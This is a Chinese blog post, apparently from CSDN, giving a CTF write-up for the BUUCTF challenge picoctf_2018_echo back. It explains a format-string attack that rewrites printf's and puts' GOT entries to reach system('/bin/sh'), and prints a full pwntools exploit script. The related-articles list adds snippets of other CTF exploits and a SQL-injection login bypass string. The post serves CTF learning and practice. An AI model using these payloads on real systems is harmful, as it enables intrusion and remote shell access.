[BUUCTF] picoctf_2018_echo back

已于 2022-03-17 21:48:03 修改
阅读量2.8k 收藏
点赞数 1
分类专栏: BUUCTF_Pwn 文章标签: 安全
于 2022-03-15 21:37:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyxx_wjc/article/details/123512426
版权

小白最近感觉遇到了瓶颈期,做题老是做不出来,听大佬说把做过的题整理整理有利于提升,就决定写点东西发出来,既能方便复习,也利于和大佬们交流。

参考了大佬的博客[BUUCTF-pwn]——picoctf_2018_echo back_Y-peak的博客-CSDN博客

拿到题目先checksec一下,发现是32位的题,开了NX,Partial RELRO和Canary。

 打开ida,在vuln函数中有很明显的格式化字符串漏洞,同时程序还调用了system函数。

由于程序只是开启了Partial RELRO ,got表可写,若是将printf函数对应的got表项的值修改为system函数的地址,并再让程序执行vuln,就可以轻而易举拿到shell。但是vuln函数并没有循环执行,这就需要我们在利用格式化字符串漏洞修改printf函数的got表的同时,将接下来会执行的函数的got表内容修改为vuln函数的地址。这样程序会再次执行printf(buf)(实际上已经是system(buf)),从而拿到shell。

这里我们选择修改puts函数的got表为vuln函数地址。

易确定buf最低位四个字节是printf的第七个参数

编写payload时,为防止传输的字符数量太多而超时,选择两个两个字节读入。

exp如下:

from pwn import *

context.log_level='debug'
r=remote('node4.buuoj.cn',29396)
#r=process('/home/wjc/Desktop/PicoCTF_2018_echo_back')
e=ELF('/home/wjc/Desktop/PicoCTF_2018_echo_back')

printf_got=0x804A010
puts_got=0x0804A01C
system_plt=0x8048460
vuln_plt=0x80485AB
print('system_plt:',hex(system_plt))

r.recvuntil('input your message:')
pay1='%'+str(0x804)+'c'+'%18$hn'+'%19$hn'
pay1+='%'+str(0x8460-0x804)+'c'+'%20$hn'
pay1+='%'+str(0x85AB-0x8460)+'c'+'%21$hn'
pay1=pay1.ljust(44,'a')
pay1+=p32(printf_got+2)+p32(puts_got+2)+p32(printf_got)+p32(puts_got)
#print(len(pay1))
r.sendline(pay1)
r.recvuntil('input your message:')
r.sendline('/bin/sh\x00')

r.interactive()

最终也是成功拿到flag:

Jmp.Cliff
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
picoCTF2018 Writeup之Web Exploitation
zwish的信安之路
09-16 1720
My New Website 打开发现是个登录界面,随便输入账号密码登陆成功,然后发现cookie里面有个admin字段为false,改为True(一定要大写) 得到flag:picoCTF{l0g1ns_ar3nt_r34l_92020990} Irish Name Repo 没有任何过滤的注入,直接到/admin登录页面,使用万能密码admin' or '1'='1登录即可 my r...
BUUCTFPicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 339
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
[BUUCTF-pwn]——picoctf_2018_echo back
Y_peak的博客
04-03 391
[BUUCTF-pwn]——picoctf_2018_echo back 和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1 思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好 找偏移, 为7 不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。 exploit from pwn import* p=remote('node3.buuoj.cn',27945)
picoctf_2018_echo back
最新发布
qq_62887641的博客
09-18 34
32位,没开pie,可改got表有system,并且存在格式化字符串漏洞,很明显改got然后写/bin/sh就行。
tcpecho.zip_Echo Echo_echo server_echotcpip
09-22
【TCP/IP Echo 服务器原理与实现】 在计算机网络通信中,Echo 服务器是一种常见的测试工具,它接收客户端发送的数据并原样返回,主要用于检查网络连接的可靠性。"tcpecho.zip" 包含了一个基于 TCP/IP 实现的 Echo ...
uart_echo.zip_Echo Echo_echo测试串口_uartecho
09-20
"Echo Echo_echo测试串口_uartecho"指的是通过UART接口进行的回环测试,这是一种验证UART通信是否正常的基本方法。在这个场景中,LM4FLaunchpad是一款基于德州仪器(TI)LM4F微控制器的开发板,它内置了UART功能,...
uart_echo.rar_Echo Echo
09-23
"Echo Echo"项目显然涉及到通过UART接口实现数据的回显功能,即设备接收到的数据会被原样返回。这个过程有助于调试通信链路,确保数据正确传输。 在UART通信中,数据通常以字节流的形式发送,每字节包含8位数据,...
aes.rar_Echo Echo_acoustic echo
09-24
标题中的"aes.rar_Echo Echo_acoustic echo"表明这是一个与AES(Acoustic Echo Cancellation)技术相关的压缩包,其中可能包含了一些关于消除回声的音频处理资料。"Echo Echo_acoustic echo"这部分可能是对主题的...
airport_15dB.zip_Echo Echo_airport_echo cancellation
09-24
本文将围绕“airport_15dB.zip_Echo Echo_airport_echo cancellation”这一主题,深入探讨机场环境下如何进行有效的回声消除,以及相关测试向量的应用。 首先,"Echo Echo"提示我们关注的是回声的双重存在,这在...
miniSpirit.github.io
03-31
miniSpirit.github.io
picoctf_2018_echooo
doudoudedi
09-23 522
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
picoctf_2018_echooo(fmt)
m0_51251108的博客
11-19 342
picoctf_2018_echooo 这题还是蛮有意思的 程序分析: 它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好 要写个脚本转换下,倒着组合一下 exp: from pwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',29996) offest=11+(0x8c-0x4c)/4 print offest flag='' for i in range(11): payload='
BUUOJ PWN picoctf_2018_rop chain
weixin_50287973的博客
11-07 178
EXP1 from pwn import* from LibcSearcher import LibcSearcher #p=process("./PicoCTF_2018_rop_chain") p=remote("node3.buuoj.cn",25091) elf=ELF('./PicoCTF_2018_rop_chain') start=0x080484D0 payload=(0x18+4)*'a'+p32(elf.plt['puts'])+p32(start)+p32(elf.got['put
echo_back(xctf)
weixin_43868725的博客
08-16 709
0x0 程序保护和流程 保护: 流程: main() echo_back() 存在一个格式化字符串漏洞。 0x1 利用过程 1.题目保护全开,程序中又没有可用的字符串,函数。所以只能通过格式化字符串漏洞泄露地址,写入有限数据。 2.既然有格式化字符串漏洞,肯定是要泄露栈上的信息。但是由于限制了字符串最长为7,所以只能逐位泄露。 选择使用ida的远程调试,因为可以丢弃alarm()发出的signal。选择在echo_back()的retn处下断点 直到到输入%6$p时在栈上发现了被输出的数据(为什么是
攻防世界PWN之echo_back题解
seaaseesa的博客
11-17 2446
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
攻防世界(pwn)echo_back + magic (_IO_FILE文件流攻击初探)
PLpa的博客
03-14 1348
前言: 这两题都是关于_IO_FILE文件流攻击的题目,如果对_IO_FILE文件流不是很清楚,可以看ctfwiki中的_IO_FILE介绍——传送门。 echo_back——关于_IO_2_1_stdin结构的利用 文件保护全开,不能got覆写。 进入IDA,发现程序有两个功能,一个是setname,一个是echo back。 查看setname功能,发现此功能只能输入7个字节,不具备RO...
module sr04( input clk , input rst_n , input echo , output wire trig , output echo_d, output [7:0] distance ); parameter INTERVAL = 5_000_000; //100ms reg [22:0] cnt ; reg [24:0] echo_cnt_reg[3:0], echo_cnt; wire [21:0] echo_mean; reg [1:0] addr; reg echo_1,echo_2; wire echo_flag; wire echo_h; assign echo_h = (~echo_2) & echo_1; assign echo_d = (~echo_1) & echo_2; assign trig = (cnt < 500) ? 1 : 0; assign distance = echo_mean * 78 / 1_000_000; assign echo_mean = (echo_cnt_reg[0]+echo_cnt_reg[1]+echo_cnt_reg[2]+echo_cnt_reg[3]) >> 2; always @(posedge clk or negedge rst_n) begin if(!rst_n)begin addr <= 0; echo_cnt_reg[0] <= 0; echo_cnt_reg[1] <= 0; echo_cnt_reg[2] <= 0; echo_cnt_reg[3] <= 0; end else if(echo_d)begin echo_cnt_reg[addr] <= echo_cnt; if(addr == 3) addr <= 0; else addr <= addr + 1; end else begin addr <= addr; echo_cnt_reg[addr] <= echo_cnt_reg[addr]; end end always @(posedge clk or negedge rst_n) begin if(!rst_n)begin cnt <= 0; end else if(cnt == INTERVAL) cnt <= 0; else cnt <= cnt + 1'b1; end always @(posedge clk or negedge rst_n) begin if(!rst_n)begin echo_1 <= 0; echo_2 <= 0; end else begin echo_1 <= echo ; echo_2 <= echo_1; end end always @(posedge clk or negedge rst_n) begin if(!rst_n) echo_cnt <= 0; else if(!cnt) echo_cnt <= 0; else if(echo) echo_cnt <= echo_cnt + 1; else echo_cnt <= echo_cnt; end endmodule 分析其中的核心代码及其功能
06-07
assign echo_mean = (echo_cnt_reg[0]+echo_cnt_reg[1]+echo_cnt_reg[2]+echo_cnt_reg[3]) >> 2; always @(posedge clk or negedge rst_n) begin if(!rst_n)begin addr ; echo_cnt_reg[0] ; echo_cnt_reg[1] ; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值